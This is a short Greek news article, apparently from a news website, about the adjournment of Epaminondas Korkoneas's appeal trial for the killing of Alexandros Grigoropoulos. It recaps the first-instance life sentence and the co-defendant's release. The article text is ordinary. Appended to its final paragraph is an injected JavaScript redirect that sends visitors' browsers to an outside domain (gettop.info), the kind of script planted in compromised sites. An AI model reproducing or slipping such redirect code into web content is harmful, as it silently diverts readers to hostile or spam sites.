Διεκόπη για τις 30 Νοεμβρίου η δίκη Κορκονέα για τη δολοφονία Γρηγορόπουλου

0
3

 

Για τις 30 Νοεμβρίου στο Μικτό Ορκωτό Εφετείο της Λαμίας διεκόπη η δίκη Κορκονέα, για την εκδίκαση της υπόθεσης της δολοφονίας του 15χρονου μαθητή Αλέξανδρου Γρηγορόπουλου σε δεύτερο βαθμό μετά τις πολλαπλές αναβολές που είχαν δοθεί το προηγούμενο διάστημα.

Είναι χαρακτηριστικό ότι κατά την ακροαματική διαδικασία η πολιτική αγωγή υπέβαλε αίτημα αναβολής της δίκης, καθώς δεν υπήρχε δυνατότητα να είναι παρόντες καθοριστικοί μάρτυρες. Το δικαστήριο απέρριψε το αίτημα αναβολής και διέκοψε την συνεδρίαση για 30 Νοεμβρίου.

Υπενθυμίζεται ότι πρωτόδικα από το Μεικτό Ορκωτό της ‘Αμφισσας ο Επαμεινώνδας Κορκονέας είχε καταδικαστεί σε ισόβια κάθειρξη, καθώς είχε κριθεί ένοχος για ανθρωποκτονία από πρόθεση με άμεσο δόλο χωρίς να του αναγνωριστεί κανένα ελαφρυντικό και από τότε είναι στις φυλακές Δομοκού.

Αντίθετα ο συγκατηγορούμενος του Βασίλης Σαραλιώτης αρχικά είχε καταδικαστεί σε 10ετή κάθειρξη, ωστόσο όμως αποφυλακίστηκε με περιοριστικούς όρους το 2012. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here